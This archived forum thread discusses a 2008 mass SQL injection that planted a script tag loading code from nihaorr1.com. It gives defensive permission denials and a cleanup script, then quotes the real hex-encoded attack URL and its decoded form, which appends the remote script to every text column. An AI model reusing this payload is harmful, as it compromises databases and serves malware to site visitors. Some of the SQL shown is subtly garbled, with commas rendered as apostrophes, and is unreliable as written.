We are excited to announce that the IIS.NET Forums are moving to the new Microsoft Q&A experience. Learn more >

View Complete Thread
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 07, 2008 05:25 PM|greenlit_design|LINK

    Thanks for posting this. It did help. I just wanted to contribute also to the group. We got SQL injected last night by this and this is how i fixed it.

    1) First to prevent script from executing or any further issues:

    deny select on sysobjects to sql_login_of_your_app
    deny select on syscomments  to ql_login_of_your_app
    deny select on syscolumns  to ql_login_of_your_app
    deny select on systypes  to ql_login_of_your_app

    The script won't even get access to the sys tables anymore (you can add more but these are the minimum).


    2) use what the Hacker used.

    select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

    That query tells who what was infected.
    With a night without sleep and few hours later, here is the script that will go thru all the tables / column and remove that string.

    Hope this help. Don't hesitate if you have questions.
    Thanks




    Use DBname --- (your actual DB infected)
    go
     
    -- (if needed) drop table tmp_tableInfected
    create table tmp_tableInfected
          (t varchar(100),
                c varchar(100),
          total int)
     
    -- (if needed) truncate table tmp_tableInfected
     
    Declare @sqlInjectString varchar(200)

    --- here you specify the sql inject string. They used 2 different ones in our case
    Set @sqlInjectString = '<script src=http://www.nihaorr1.com/1.js></script>'


     
    DECLARE @T varchar(255),
    @C varchar(255)
     
    set nocount on
     
    DECLARE Table_Cursor
    CURSOR FOR
    select top 10    a.name,
    b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    and a.name not in ('t_article', 'tbl_reviews', 'tbl_articles', 'tbl_reviews_BK','tbl_spotlights_BK')
    order by a.name, b.name
     
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor
    INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
     
          --print ('insert into tmp_tableInfected select '''
          --+  @T +  ''','''
          --+  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          --+ @C  + '] LIKE ''%'
          --+ @sqlInjectString + '%'' having count(*) > 0')
     
          Exec ('insert into tmp_tableInfected select '''
          +  @T +  ''','''
          +  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          + @C  + '] LIKE ''%'
          + @sqlInjectString + '%'' having count(*) > 0')
     
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END CLOSE Table_Cursor
    DEALLOCATE Table_Cursor
     
     
    --DECLARE @T varchar(255),
    --@C varchar(255)
     
    DECLARE fixSQLInject_Cursor
    CURSOR FOR
    select t,c from tmp_tableInfected
     
    OPEN fixSQLInject_Cursor
    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
     
          Print 'update ' + @t + ' set ' + @c + ' = replace('+ @c + ',''' + @sqlInjectString + ''', '''')'
          --- exec ('update ' + @t + ' set ' + @c + ' = replace('+ @c + ',''' + @sqlInjectString + ''', '''')')
     
    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    END CLOSE fixSQLInject_Cursor
    DEALLOCATE fixSQLInject_Cursor
     
    --select t,c,total from tmp_tableInfected
     
     
     
    drop table tmp_tableInfected
     


     

     

     

     

     

     

    powlette

    Long story short, it's definitely SQL injection. here's the offending url:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000 4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055 00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900 73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069 006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000 62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031 0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00 200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043 0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00 27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075 00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

    decoding that binary data which is cast to a varchar yields this:

    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to it.